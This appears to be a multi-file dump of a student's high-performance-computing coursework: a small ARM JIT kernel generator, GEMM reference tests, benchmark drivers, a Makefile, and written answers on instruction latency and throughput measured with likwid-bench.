MINI_JIT_BACKEND_KERNEL_H\n\nnamespace mini_jit {\n namespace backend {\n class Kernel;\n }\n}\n\nclass mini_jit::backend::Kernel {\n private:\n //! high-level code buffer\n std::vector< uint32_t > m_codeBuffer;\n\n //! size of the kernel\n std::size_t m_sizeKernel = 0;\n\n //! executable kernel\n uint32_t * m_kernel = nullptr;\n\n //! instruction-offset in bytes since last reset\n uint32_t m_offset = 0;\n\n /**\n * Allocates memory through POSIX mmap.\n *\n * @param i_nBytes number of bytes.\n **/\n void * allocMmap( std::size_t i_nBytes ) const;\n\n /**\n * Frees POSIX mmap allocated memory.\n *\n * @param i_nBytes number of bytes.\n * @param i_mem pointer to memory which is freed.\n **/\n void freeMmap( std::size_t i_nBytes,\n void * i_mem ) const;\n \n /**\n * Sets the given memory region executable.\n *\n * @param i_nBytes number of bytes.\n * @param i_mem pointer to memory.\n **/\n void setExecutable( std::size_t i_nBytes,\n void * i_mem ) const;\n\n /**\n * Frees the code buffer and frees the kernel if set.\n **/\n void free();\n\n public:\n /**\n * Destructor\n **/\n ~Kernel();\n\n /**\n * Adds an instruction to the code buffer.\n *\n * @param i_ins instruction which is added.\n **/\n void addInstruction( uint32_t i_ins );\n\n /**\n * Resets the offset\n **/\n void resetOffset();\n\n /**\n * Gets the offset.\n *\n * @return offset in bytes since last reset.\n **/\n uint32_t getOffset();\n\n /**\n * Gets the size of the kernel.\n *\n * @return size of the generated code in bytes.\n **/\n uint32_t getSize();\n\n /**\n * Sets the kernel based on the code buffer.\n **/\n void setKernel();\n\n /**\n * Gets a pointer to the kernel.\n **/\n void const * getKernel() const;\n\n\n /**\n * Writes the code buffer to the given file.\n *\n * @param i_path path to the file.\n **/\n void write( char const *i_path ) const;\n};\n\n#endif" }, { "alpha_fraction": 0.6395147442817688, "alphanum_fraction": 0.6481802463531494, "avg_line_length": 19.64285659790039, "blob_id": "135975d053c8d62e8cf11652e3b9943d564775ce", "content_id": "4803df9670d3c8e4da94d18157e77a80cce43760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 61, "num_lines": 28, "path": "/exercise_9/mini_jit_base/src/generators/Loop.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_LOOP_H\n#define MINI_JIT_GENERATORS_LOOP_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class Loop;\n }\n}\n\nclass mini_jit::generators::Loop {\n private:\n //! 
kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a kernel which increments x0 through a loop.\n *\n * @param i_nIterations number of iterations in the loop.\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate( uint32_t i_nIterations ) )();\n};\n\n#endif" }, { "alpha_fraction": 0.25414156913757324, "alphanum_fraction": 0.4518072307109833, "avg_line_length": 35.38356018066406, "blob_id": "f317a3401f52e2fff11ab71d92476bbde1f186da", "content_id": "d441e012f2bef59716ad9ec96c98852a9b34d058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2656, "license_type": "no_license", "max_line_length": 102, "num_lines": 73, "path": "/exercise_4/src/gemm_ref_test.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#define CATCH_CONFIG_MAIN \n#include \"catch.hpp\"\n#include \"gemm_ref.hpp\"\n#include \"util.hpp\"\n\n\nTEST_CASE( \"Matrices are compared\", \"[compare_matrices]\" ) \n{\n float eye[9] = {1, 0, 0, 0, 1, 0, 0, 0, 1};\n float a[20] = {1, 2, 3, 4, 42, 5, 6, 7, 8, 42, 9, 10, 11, 12, 42, 13, 14, 15, 16, 42};\n float b[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};\n float c[16] = {2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17};\n \n REQUIRE(compare_matrices(eye, eye, 3, 3, 3, 3));\n REQUIRE(compare_matrices(a, a, 4, 4, 5, 5));\n REQUIRE(compare_matrices(b, b, 4, 4, 4, 4));\n REQUIRE(compare_matrices(a, b, 4, 4, 5, 4));\n REQUIRE(compare_matrices(a, c, 4, 4, 5, 4) == false);\n REQUIRE(compare_matrices(b, c, 4, 4, 4, 4) == false);\n}\n\nTEST_CASE( \"GEMM reference kernel\" \"[gemm_ref]\")\n{\n // CASE 1\n float c_1[9] = {1, 0, 0, 0, 1, 0, 0, 0, 1};\n float a_1[12] = {1, 4, 7, 25, 2, 5, 8, 25, 3, 6, 9, 25};\n float b_1[9] = {2, 8, 14, 4, 10, 16, 6, 12, 18};\n \n float c_1_res[9] = {61, 132, 204, 72, 163, 252, 84, 192, 301};\n \n gemm_ref(a_1, b_1, c_1, 3, 3, 3, 4, 3, 3); \n REQUIRE(compare_matrices(c_1_res, c_1, 3, 3, 3, 3));\n \n // CASE 2\n float c_2[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};\n float a_2[16] = {2, 0, 0, 0, 0, 2, 0, 0, 0, 0, 2, 0, 0, 0, 0, 2};\n float b_2[16] = {3, 0, 0, 0, 0, 3, 0, 0, 0, 0, 3, 0, 0, 0, 0, 3};\n \n float c_2_res[16] = {6, 0, 0, 0, 0, 6, 0, 0, 0, 0, 6, 0, 0, 0, 0, 6};\n \n gemm_ref(a_2, b_2, c_2, 4, 4, 4, 4, 4, 4);\n REQUIRE(compare_matrices(c_2, c_2_res, 4, 4, 4, 4));\n \n // CASE 3\n float c_3[20] = {2, 0, 0, 0, 24, 0, 2, 0, 0, 42, 0, 0, 2, 0, 42, 0, 0, 0, 2, 42};\n float a_3[24] = {3, 0, 0, 0, 52, 67, 0, 3, 0, 0, 215, 123, 0, 0, 3, 0, 5, 24, 0, 0, 0, 3, 42, 42};\n float b_3[16] = {1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1};\n \n float c_3_res[16] = {5, 0, 0, 0, 0, 5, 0, 0, 0, 0, 5, 0, 0, 0, 0, 5};\n \n gemm_ref(a_3, b_3, c_3, 4, 4, 4, 6, 4, 5);\n REQUIRE(compare_matrices(c_3, c_3_res, 4, 4, 5, 4));\n \n // CASE 4\n float c_4[9] = {0, 0, 0, 0, 0, 0, 0, 0, 0};\n float a_4[3] = {1, 2, 3};\n float b_4[3] = {1, 2, 3};\n \n float c_4_res[9] = {1, 2, 3, 2, 4, 6, 3, 6, 9};\n \n gemm_ref(a_4, b_4, c_4, 3, 3, 1, 3, 1, 3);\n REQUIRE(compare_matrices(c_4, c_4_res, 3, 3, 3, 3));\n \n // CASE 5\n float c_5[1] = {0};\n float a_5[3] = {0.9653f, 0.2732f, 0.4596f};\n float b_5[3] = {0.5098f, 0.8970f, 0.7755f};\n \n float c_5_res[1] = {1.0937f};\n \n gemm_ref(a_5, b_5, c_5, 1, 1, 3, 1, 3, 1);\n REQUIRE(compare_matrices(c_5, c_5_res, 1, 1, 1, 1, 1.0e-3));\n}\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6688504815101624, "avg_line_length": 36.28888702392578, "blob_id": 
"234eff04dd565c5711846ef09e84c12e7a723d69", "content_id": "923f695081b0ec8634b8ec5be43293cbe104e5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1679, "license_type": "no_license", "max_line_length": 149, "num_lines": 45, "path": "/exercise_3/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# Task 1: key metrics\n\ninstruction | used pipelines | latency | throughput\n-----------------------------------------------------\nfmul | FP/ASIMD 0 and 1 | 3 | 2\n\nfmla | FP/ASIMD 0 and 1 | 4 | 2\n\n\n# Task 2: theoretical peak performance\n\noperations / second = frequency * operations / cycle\n\nFrequency: f = 2.5 GHz = 2.5 * 10^9 Hz\n\nOur pipeline is bound by the latency. In this case the throughput per pipeline is 1/3 (or 1/4 in case of fmla).\n\noperations / cycle = 1/latency * p where p is 2 for double precision and 4 for single precision\n\ntpp_fmul_sp = 2.5 * 10^9 * 1/3 * 4 = 3.333... GFLOPS\ntpp_fmla_sp = 2.5 * 10^9 * 1/4 * 4 = 2.5 GFLOPS\n\n# Task 3: micro-benchmark fmla\n\nMeasuring with likwid-bench -t latency_src_asimd_fmla_sp -w S0:1GB:1 \ngave as result MFlops/s: 4996.79\n\nThis is twice the value compared to the theoretical peak performance. However our Neoverse N1 has two pipelines and so the tpp value must be doubled.\n\n# Task 4: micro-benchmark fmul\n\nMeasuring with likwid-bench -t latency_src_asimd_fmul_sp -w S0:1GB:1\ngave as result: MFlops/s: 6662.08\nWhich coincides with the theoretical peak performance of one pipeline and two pipelines used by the Neoverse N1.\n\n# Task 5: data dependency destination register\n\nMeasuring with likwid-bench -t latency_dst_asimd_fmla_sp -w S0:1GB:1 \nMFlops/s: 9993.08\n\nMeasuring with likwid-bench -t latency_dst_asimd_fmul_sp -w S0:1GB:1\nMFlops/s: 39968.92\n\nThe performance is much higher in both cases.\nSince the results are never used again (and especially not by the next instruction) and therefor the pipeline can be kept full. \n" }, { "alpha_fraction": 0.6584158539772034, "alphanum_fraction": 0.6650164723396301, "avg_line_length": 20.678571701049805, "blob_id": "310bea24447828bcb27f65425500515881b9e959", "content_id": "f0f55753f30d41956bd8a23c0a4e0d51a7c0c5ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 606, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/exercise_9/mini_jit_base/src/generators/MyExample.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_MYEXAMPLE_H\n#define MINI_JIT_GENERATORS_MYEXAMPLE_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class MyExample;\n }\n}\n\nclass mini_jit::generators::MyExample {\n private:\n //! 
kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a kernel which calculates the factorial through a loop.\n *\n * @param i_fac number for which the factorial should be computed\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate(uint32_t i_fac) )();\n};\n\n#endif" }, { "alpha_fraction": 0.4887005686759949, "alphanum_fraction": 0.4963276982307434, "avg_line_length": 34.75757598876953, "blob_id": "a63f19e9b17349e82c0458baf4eaae4e3628c354", "content_id": "1a530de9f557f13b9c4434da65962af622a9cf05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3540, "license_type": "no_license", "max_line_length": 129, "num_lines": 99, "path": "/exercise_4/src/driver_4_4.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"util.hpp\"\n#include \"gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\n#include <libxsmm.h>\n\nint main()\n{\n std::vector<unsigned int> lambdas = {4, 8, 12, 16, 24, 32, 48, 64};\n const unsigned int iterations = 100000;\n \n \n \n \n for (auto lambda : lambdas) \n {\n int m = lambda;\n int n = lambda;\n int k = lambda;\n int lda = lambda;\n int ldb = lambda;\n int ldc = lambda;\n std::cout << \"#######################################\" << std::endl; \n std::cout << \" M = N = K = ld A = ld B = ld C = \" << lambda << std::endl;\n std::cout << \" Initializing random matrices...\" << std::endl;\n float* A = random_matrix(m, k, lda);\n float* B = random_matrix(k, n, ldb);\n float* C = random_matrix(m, n, ldc);\n \n int flop_gemm = lambda * lambda * (2 * lambda);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring (reference kernel).\" << std::endl;\n \n float* A_test = random_matrix(m, k, lda);\n float* B_test = random_matrix(k, n, ldb);\n float* C_ref = zero_matrix(m, n, ldc);\n float* C_xsmm = zero_matrix(m, n, ldc);\n \n \n gemm_ref(A_test, B_test, C_ref, m, n, k, lda, ldb, ldc);\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_ref(A, B, C, m, n, k, lda, ldb, ldc);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n \n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n std::cout << std::endl << \"Performance of libxsmm kernel\" << std::endl;\n \n float alpha = 1.0, beta = 1.0;\n int flags = LIBXSMM_GEMM_FLAG_NONE;\n libxsmm_smmfunction kernel = libxsmm_smmdispatch(m, n, k, &lda, &ldb, &ldc, &alpha, &beta, &flags, nullptr /*prefetch*/);\n \n kernel(A_test, B_test, C_xsmm);\n \n std::cout << \"Comparing results... 
\" << std::endl;\n if (compare_matrices(C_ref, C_xsmm, m, n, ldc, ldc))\n {\n std::cout << \"Test passed!\" << std::endl;\n }\n else\n {\n std::cerr << \"Test failed!\" << std::endl;\n }\n \n std::cout << \"Starting time measuring (libxsmm kernel).\" << std::endl;\n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n kernel(A, B, C);\n }\n end_time = std::chrono::high_resolution_clock::now();\n \n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n\tstd::cout << \"################################\" << std::endl << std::endl;\n delete[] A;\n delete[] B;\n delete[] C;\n }\n \n \n}\n" }, { "alpha_fraction": 0.35618066787719727, "alphanum_fraction": 0.4310618042945862, "avg_line_length": 29.792682647705078, "blob_id": "f29ce7fac8d263ba16e3468ec47d86bb7d13ba63", "content_id": "ad09b5330ecd1428eb5b4bd0f96dc39677d00a91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2524, "license_type": "no_license", "max_line_length": 69, "num_lines": 82, "path": "/exercise_9/mini_jit_base/src/instructions/Base.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Base.h\"\n\nuint32_t mini_jit::instructions::Base::bRet() {\n return 0xd65f03c0;\n}\n\nuint32_t mini_jit::instructions::Base::bCbnz( uint8_t i_regGp,\n int32_t i_imm19,\n uint8_t i_size ) {\n uint32_t l_ins = 0x35000000;\n l_ins |= 0x1f & i_regGp;\n l_ins |= (0x7FFFF & i_imm19) << 5;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMovImm( uint8_t i_regGp,\n uint16_t i_imm16,\n uint8_t i_size ) {\n uint32_t l_ins = 0x52800000;\n l_ins |= 0x1f & i_regGp;\n l_ins |= i_imm16 << 5;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMovReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint8_t i_size )\n{\n uint32_t l_ins = 0xAA0003E0;\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 16;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpAddImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size ) {\n uint32_t l_ins = 0x11000000;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpSubImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size ) {\n uint32_t l_ins = 0x51000000;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Base::dpMulReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc1,\n uint8_t i_regGpSrc2,\n uint8_t i_size )\n{\n uint32_t l_ins = 0x9B007C00;\n\n l_ins |= 0x1f & i_regGpDes;\n l_ins |= (0x1f & i_regGpSrc1) << 5;\n l_ins |= (0x1f & i_regGpSrc2) << 16;\n l_ins |= (0x1 & i_size) << 31;\n\n return l_ins;\n}" }, { "alpha_fraction": 0.5160301923751831, "alphanum_fraction": 0.5570485591888428, "avg_line_length": 39.400001525878906, "blob_id": "f8013993789255f6b3b0a2e8f24ac12210c0905b", "content_id": 
"e8797bc8e549a4ae0e0ab36c32ae6cf7ecd7c3d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4242, "license_type": "no_license", "max_line_length": 114, "num_lines": 105, "path": "/exercise_4/src/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"util.hpp\"\n#include \"gemm_ref.hpp\"\n#include \"gemm_compiler_32_32_32_32_32_32.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nint main()\n{\n std::vector<unsigned int> lambdas = {4, 8, 12, 16, 24, 32, 48, 64};\n const unsigned int iterations = 10000;\n \n for (auto lambda : lambdas) \n {\n std::cout << \" M = N = K = ld A = ld B = ld C = \" << lambda << std::endl;\n std::cout << \" Initializing random matrices...\" << std::endl;\n float* A = random_matrix(lambda, lambda, lambda);\n float* B = random_matrix(lambda, lambda, lambda);\n float* C = random_matrix(lambda, lambda, lambda);\n \n int flop_gemm = lambda * lambda * (2 * lambda - 1);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_ref(A, B, C, lambda, lambda, lambda, lambda, lambda, lambda);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n //auto time = std::chrono::duration_cast<std::chrono::seconds>(end_time - start_time);\n //std::chrono::duration<double, std::seconds> needed_time = end_time - start_time;\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n delete[] A;\n delete[] B;\n delete[] C;\n }\n \n std::cout << \"###########################\" << std::endl << std::endl;\n \n float* A = random_matrix(32, 32, 32);\n float* B = random_matrix(32, 32, 32);\n float* C_ref = zero_matrix(32, 32, 32);\n float* C_mnk = zero_matrix(32, 32, 32);\n float* C_nkm = zero_matrix(32, 32, 32);\n \n std::cout << \"Comparing results... \" << std::endl;\n gemm_ref(A, B, C_ref, 32, 32, 32, 32, 32, 32);\n gemm_compiler_32_32_32_32_32_32_mnk(A, B, C_mnk);\n gemm_compiler_32_32_32_32_32_32_nkm(A, B, C_nkm);\n \n if (compare_matrices(C_ref, C_mnk, 32, 32, 32, 32) && compare_matrices(C_ref, C_nkm, 32, 32, 32, 32))\n {\n std::cout << \"Test passed!\" << std::endl;\n }\n else\n {\n std::cerr << \"Test failed!\" << std::endl;\n }\n \n std::cout << \"Measuring performance... 
\" << std::endl;\n int flop_gemm = 32 * 32 * (2 * 32 - 1);\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"gemm_compiler_32_32_32_32_32_32_mnk:\" << std::endl;\n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_compiler_32_32_32_32_32_32_mnk(A, B, C_mnk);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n std::cout << \"gemm_compiler_32_32_32_32_32_32_nkm:\" << std::endl;\n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_compiler_32_32_32_32_32_32_nkm(A, B, C_mnk);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained GFLOPS: \" << flop_gemm * iterations / needed_time.count() << std::endl;\n \n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_mnk;\n delete[] C_nkm;\n\n}\n" }, { "alpha_fraction": 0.5035842061042786, "alphanum_fraction": 0.5268816947937012, "avg_line_length": 22.29166603088379, "blob_id": "80186c72cf9cc96e8cbf4e7a24d8576e3d87a652", "content_id": "7b731d12f11121d4465279d0427fe202f48b037e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 558, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/exercise_9/mini_jit_base/src/generators/Simple.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Simple.h\"\n\nuint32_t ( *mini_jit::generators::Simple::generate() )() {\n uint32_t l_ins = 0;\n\n // mov w0, #0x3\n l_ins = instructions::Base::dpMovImm( 0,\n 3,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n\n // we might debug through file-io\n std::string l_file = \"simple.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.6046798229217529, "alphanum_fraction": 0.6625615954399109, "avg_line_length": 88.66666412353516, "blob_id": "328a39dd82fd8e54ba909e1df6eedf6f564fe640", "content_id": "4ef8a5c0953219da1e227a7f38b8b516f28e36e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 812, "license_type": "no_license", "max_line_length": 202, "num_lines": 9, "path": "/exercise_7/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\n\ngemm_asm_asmid: driver.cpp ../exercise_4/src/gemm_ref.cpp ../exercise_4/src/util.cpp gemm_asm_asimd_19_4_4.s gemm_asm_asimd_32_32_32.s\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/gemm_ref.cpp -o ${BUILD_DIR}/gemm_ref.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/util.cpp -o ${BUILD_DIR}/util.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c 
gemm_asm_asimd_19_4_4.s -o ${BUILD_DIR}/gemm_asm_asimd_19_4_4.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_32_32_32.s -o ${BUILD_DIR}/gemm_asm_asimd_32_32_32.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 driver.cpp ${BUILD_DIR}/gemm_ref.o ${BUILD_DIR}/util.o ${BUILD_DIR}/gemm_asm_asimd_19_4_4.o ${BUILD_DIR}/gemm_asm_asimd_32_32_32.o -o ${BUILD_DIR}/driver \n$(shell mkdir -p build)\n \n" } ]
44
byambaa1982/usefulregex
https://github.com/byambaa1982/usefulregex
b7b34fba1b52dd5fb63e8a08c4d9139239b8ebe3
34c325e6f4e0257fbfb74d61a52263902e858271
9a2d04abd2f25aade7226493de7ece29251e4f10
refs/heads/master
2023-02-21T02:29:14.018542
2023-02-12T05:26:53
2023-02-12T05:26:53
236,561,661
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5377358198165894, "alphanum_fraction": 0.5448113083839417, "avg_line_length": 19.190475463867188, "blob_id": "9a36ebadd567c535c523a43c218b193a3ecb5f14", "content_id": "dd247022629d58e990d0e62b1e754a0f13b52b1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 848, "license_type": "no_license", "max_line_length": 79, "num_lines": 42, "path": "/main.py", "repo_name": "byambaa1982/usefulregex", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport numpy as np \n\n\n\n\n#--------------no regex version---------------\n# ---------------turn any string into foat-------------\ndef anystring_to_float(string):\n newstring =\"\" \n my_float=\"\"\n count=0\n try:\n for a in string: \n if a=='.' or (a.isnumeric()) == True: \n count+= 1\n my_float+=a\n else: \n newstring+= a \n # print(count) \n # print(newstring) \n # print('data type of {} is now {}'.format(num, type(num)))\n return float(my_float)\n except:\n return np.nan\n\n\n# anystring_to_float(string)\n\n\ndef change_df(df):\n for i in indice_of_columns:\n print(df.columns[i])\n df[df.columns[i]]=df[df.columns[i]].map(lambda row:anystring_to_float(row))\n return df\n\n\n#--------You should change indice list here: ---------\n\n\nindice_of_columns=[5,7,8,9]\nchange_df(df)\n" }, { "alpha_fraction": 0.6338363885879517, "alphanum_fraction": 0.6525020003318787, "avg_line_length": 19.983333587646484, "blob_id": "c7cf5477be02a55acc29e6e3cc5d3eb5644fb849", "content_id": "d28f2ce44497f31212b051f05a964cdb8debd96f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2518, "license_type": "no_license", "max_line_length": 110, "num_lines": 120, "path": "/README.md", "repo_name": "byambaa1982/usefulregex", "src_encoding": "UTF-8", "text": "## Data cleaning without using regex\n\nAll code is here:\nhttps://github.com/byambaa1982/usefulregex/blob/master/main.py\n\nIf you want to fork the project on github and git clone your fork, e.g.:\n\n git clone https://github.com/<username>/usfulregex.git\n \nAs a data scientist, I wasted a lot of time cleaning data, especially for dirty data like the following one. \n\n### Raw data \n\n![Data](/images/data_pic.png)\n\n\nProblem is that we cannot use following codes because of symbols like '--' or '-' \n```python\n\tdf['DataFrame Column'] = pd.to_numeric(df['DataFrame Column'])\n\n\tor \n\n\tdf['DataFrame Column'] = df['DataFrame Column'].astype(int)\n```\nLet's take a look at one of following cells.\n\n```python\n\tprint(df['Temperature'][0])\n\tprint(df['Apparent temperature'][0])\n\tprint(df['Distance'][0])\n```\nResults:\n\t\n\t59.55 \n\t59.55\n\t1200M\n\n\nThe first two looks like floats,but it will give us 'str' not 'float'.\n```python\n\tprint(type(df['Temperature'][0]))\n\tprint(type(df['Apparent temperature'][0]))\n\tprint(type(df['Distance'][0]))\n```\nResults:\n\n\t<class 'str'>\n\t<class 'str'>\n\t<class 'str'>\n\n\nBefor going further, start simple\n\n string ='3ad.23'\n \nLet's clean this string. '3ad.23' is not digit. \n\n\n\tdef anystring_to_float(string):\n\t newstring =\"\" \n\t my_float=\"\"\n\t count=0\n\t try:\n\t for a in string: \n\t if a=='.' 
or (a.isnumeric()) == True: \n\t            count+= 1\n\t            my_float+=a\n\t            else: \n\t                newstring+= a \n\t        # print(count) \n\t        # print(newstring) \n\t        # print('data type of {} is now {}'.format(num, type(num)))\n\t        return float(my_float)\n\t    except:\n\t        return np.nan\n\n\tanystring_to_float(string)\n\nA string might also be just \"--\". In that case the function turns it into a NumPy null value (np.nan). \n\nNow we can use it on a pandas DataFrame. \n\n\tdef change_df(df):\n\t    for i in indice_of_columns:\n\t        print(df.columns[i])\n\t        df[df.columns[i]]=df[df.columns[i]].map(lambda row:anystring_to_float(row))\n\t    return df\n\nHere indice_of_columns holds the indices of the columns we want to change. In our case, it is \n\n\tindice_of_columns=[5,7,8,9]\n\nFinally, we can run the function 'change_df' and get the result. \nLet's check the types again:\n\n\tprint(type(df['Temperature'][0]))\n\tprint(type(df['Apparent temperature'][0]))\n\tprint(type(df['Distance'][0]))\n\nNew result: \n\n\t<class 'float'>\n\t<class 'float'>\n\t<class 'float'>\n\n\n### Cleaned data\n\n![Data](/images/data_pic2.png)\n\n\nIt's that simple!\n\n\nPlease connect with me on LinkedIn: \n\thttps://www.linkedin.com/in/byamba-enkhbat-026722162/\n\t\n\t\nHire me here:\n\twww.fiverr.com/coderjs\n" } ]
2
timm67/djblog9vm
https://github.com/timm67/djblog9vm
5d6c974fa96ce3efb8dc0c40bfc0bd35e048b722
550b462504522d989d770ff02108cb7249fe3143
eeb5b9a7ad63b6c13bce0d88f17dd12f26c9008b
refs/heads/master
2020-05-30T06:48:12.631778
2019-06-10T19:58:35
2019-06-10T19:58:35
189,585,998
0
0
null
null
null
null
null
